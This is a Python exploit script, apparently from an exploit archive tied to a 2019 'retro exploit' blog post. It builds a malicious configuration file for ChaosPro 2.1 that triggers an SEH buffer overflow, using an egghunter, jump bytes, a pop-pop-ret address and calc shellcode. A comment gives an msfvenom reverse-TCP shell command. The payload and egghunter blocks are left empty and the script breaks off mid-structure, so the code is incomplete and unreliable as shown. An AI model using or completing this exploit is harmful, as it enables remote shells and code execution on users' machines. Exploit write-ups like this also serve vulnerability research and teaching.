# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# our egg!
payload = "T00WT00W"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
#this needs to be a backwards jump to give us room to call stack jump code
jmpbackD0 = "\x40\x75\xD0\x75"
jmpforward06= "\x40\x75\x06\x75"
# 16 byte shellcode from: https://www.exploit-db.com/exploits/43773/
opencalc= "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
# our egghunter shellcode
egghunter = (
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
junk += "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0))
junk += "A" * (118 - len(egghunter))
# open calc
junk += egghunter
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpbackD0
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\xab\x11\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file: